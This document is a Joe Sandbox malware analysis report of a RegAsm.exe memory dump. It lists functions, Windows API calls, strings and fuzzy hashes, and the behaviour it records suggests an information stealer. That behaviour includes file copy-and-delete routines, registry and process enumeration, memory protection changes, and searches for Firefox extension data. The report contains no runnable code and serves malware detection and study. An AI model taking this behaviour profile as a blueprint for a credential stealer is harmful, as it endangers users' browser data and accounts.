Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: `_A
API String ID: 3722407311-2339250863
Opcode ID: fceb48d516bdcefcfaeeddd004ee5f3434a47fe0b6f82b20b13cf897e26d277c
Instruction ID: 94d948ae3f98129d28702617e668470e7ead908e0178ded6cd69974dbc9b1d9a
Opcode Fuzzy Hash: fceb48d516bdcefcfaeeddd004ee5f3434a47fe0b6f82b20b13cf897e26d277c
Instruction Fuzzy Hash: 3991C975A101089FCB28EF65D991BED77B5FF94304F40852EE8099F281DB349B46CB86

Function 00410765 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,0133AD08), ref: 0041079A
StrCmpCA.SHLWAPI(00000000,0133AC48), ref: 00410866
StrCmpCA.SHLWAPI(00000000,0133ACC8), ref: 0041099D

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Strings

`_A, xrefs: 00410803, 0041091B, 00410806, 0041091E

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: `_A
API String ID: 3722407311-2339250863
Opcode ID: 0851397616f20a2453b74b4a7786de3427b85f0f8ea178e1316f793f6c6bd983
Instruction ID: eaeb4c1bfeb24d12610814888c89f1e8d39eb2be5be33b2b9933dc38047eb686
Opcode Fuzzy Hash: 0851397616f20a2453b74b4a7786de3427b85f0f8ea178e1316f793f6c6bd983
Instruction Fuzzy Hash: 6081BA75B101049FCB18EF65C991AEDB7B6FF94304F50852EE8099F281DB349B46CB86

Function 0040A0A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(0133A9F8,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,?,00410153), ref: 0040A0BD
LoadLibraryA.KERNEL32(01342620,?,?,?,?,?,?,?,?,?,?,?,00410153), ref: 0040A146

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,0133AAB8,?,0042110C,?,00000000), ref: 0041A82B
Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

SetEnvironmentVariableA.KERNEL32(0133A9F8,00000000,00000000,?,004212D8,?,00410153,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00420AFE), ref: 0040A132

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 0040A0B2, 0040A0C6, 0040A0DC

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-4027016359
Opcode ID: 07a49a677ead869cdb048d5ff3e3ebc0c5f58c9520126a3c0d38a2b5359966bc
Instruction ID: 8fd865f7776555e91364b6e3317f0d6dd22ba45ac697d56d5a10bd23e480980a
Opcode Fuzzy Hash: 07a49a677ead869cdb048d5ff3e3ebc0c5f58c9520126a3c0d38a2b5359966bc
Instruction Fuzzy Hash: F9418DB9941204BFCB04EFE5ED45BEA33B6BB0A305F05112EF405A32A0DB385985CB67

Function 00406BE0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,@Jn@,@Jn@), ref: 00406C9F

Strings

Jn@, xrefs: 00406C1D, 00406C39, 00406C88, 00406C98, 00406C04, 00406C28, 00406C33
Jn@, xrefs: 00406BED, 00406C0D, 00406C8F
@Jn@, xrefs: 00406C80, 00406C83

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID: @Jn@$Jn@$Jn@
API String ID: 544645111-1180188686
Opcode ID: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
Instruction ID: b746c2a28f05bbd6b1460d210bf7098c9bc173f160aa6dfc6dfdc57a011f18e7
Opcode Fuzzy Hash: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
Instruction Fuzzy Hash: FA213374E04208EFEB04CF84C544BAEBBB5FF48304F1181AAD54AAB381D3399A91DF85

Function 004183DC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
wsprintfA.USER32 ref: 00418459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0041847B
RegQueryValueExA.KERNEL32(00000000,013429D8,00000000,000F003F,?,00000400), ref: 004184EC
lstrlenA.KERNEL32(?), ref: 00418501
RegQueryValueExA.KERNEL32(00000000,01342B28,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B34), ref: 00418599
RegCloseKey.KERNEL32(00000000), ref: 00418608

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Strings

%s\%s, xrefs: 0041844D

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: QueryValue$CloseEnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 1452615360-4073750446
Opcode ID: 2745a0ba8eb15d3c1f0b65b5c657a669296e82b89610ecc7bb468d10700aed3a
Instruction ID: cdbcbf4b9f8a1ecee5159c9abe2ba9d8dffcfa3e02281556f53420590b8fae77
Opcode Fuzzy Hash: 2745a0ba8eb15d3c1f0b65b5c657a669296e82b89610ecc7bb468d10700aed3a
Instruction Fuzzy Hash: 7B210A75940218AFDB24DB54DC85FE9B3B9FB48704F00C199E60996140DF756A85CFD4

Function 0040A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,01341B00,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,01342A80,00420AFF), ref: 0040A2E1
lstrlenA.KERNEL32(00000000,00000000), ref: 0040A3FF
lstrlenA.KERNEL32(00000000), ref: 0040A6BC

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D

DeleteFileA.KERNEL32(00000000), ref: 0040A743

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
String ID:
API String ID: 257331557-0
Opcode ID: b7176928946b1c5edd0e3b87ac6ff903d2ed7c9f838d33a1febf9b44a64ae9bf
Instruction ID: ddd88d02e0d3355bf8470c19a8c4de6788c323a7c51f3fd4630425147b47cfd6
Opcode Fuzzy Hash: b7176928946b1c5edd0e3b87ac6ff903d2ed7c9f838d33a1febf9b44a64ae9bf
Instruction Fuzzy Hash: 85E134728111089ACB04FBA5DD91EEE733CAF14314F50815EF51672091EF386A9ECB7A

Function 0040D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,01341B00,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,01342A80,00420BA6), ref: 0040D801
lstrlenA.KERNEL32(00000000), ref: 0040D99F
lstrlenA.KERNEL32(00000000), ref: 0040D9B3
DeleteFileA.KERNEL32(00000000), ref: 0040DA32

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 3c5ceba100194b79545c3d551ce876f4aace018116f61e714243a0a1ba28ee76
Instruction ID: 30f7704c13366a17925c5eaa4a94e79927efa66a8a92483c7baa761e0d0dbf9b
Opcode Fuzzy Hash: 3c5ceba100194b79545c3d551ce876f4aace018116f61e714243a0a1ba28ee76
Instruction Fuzzy Hash: 848122719111089BCB04FBE1DD52EEE7339AF14314F50452EF407A6091EF386A9ACB7A

Function 0040F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A

Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421580,00420D92), ref: 0040F54C
lstrlenA.KERNEL32(00000000), ref: 0040F56B

Strings

moz-extension+++, xrefs: 0040F5AD
^userContextId=4294967295, xrefs: 0040F59C

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 998311485-3310892237
Opcode ID: 59e3b6fef0e60a733583db89beee0d9b9a2fbad9dfe2b8ffc7aef949c7d8b4e5
Instruction ID: 431312e06e4e118a9a68feb07ac8eaa96768a2afdec7ba1937323e72019175af
Opcode Fuzzy Hash: 59e3b6fef0e60a733583db89beee0d9b9a2fbad9dfe2b8ffc7aef949c7d8b4e5
Instruction Fuzzy Hash: 19516575D11108AACB04FBB1DC52DED7338AF54314F40852EF81667191EE386B9ACBAA

Function 00418680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 004186CA
Process32First.KERNEL32(?,00000128), ref: 004186DE
Process32Next.KERNEL32(?,00000128), ref: 004186F3

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

CloseHandle.KERNEL32(?), ref: 00418761

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
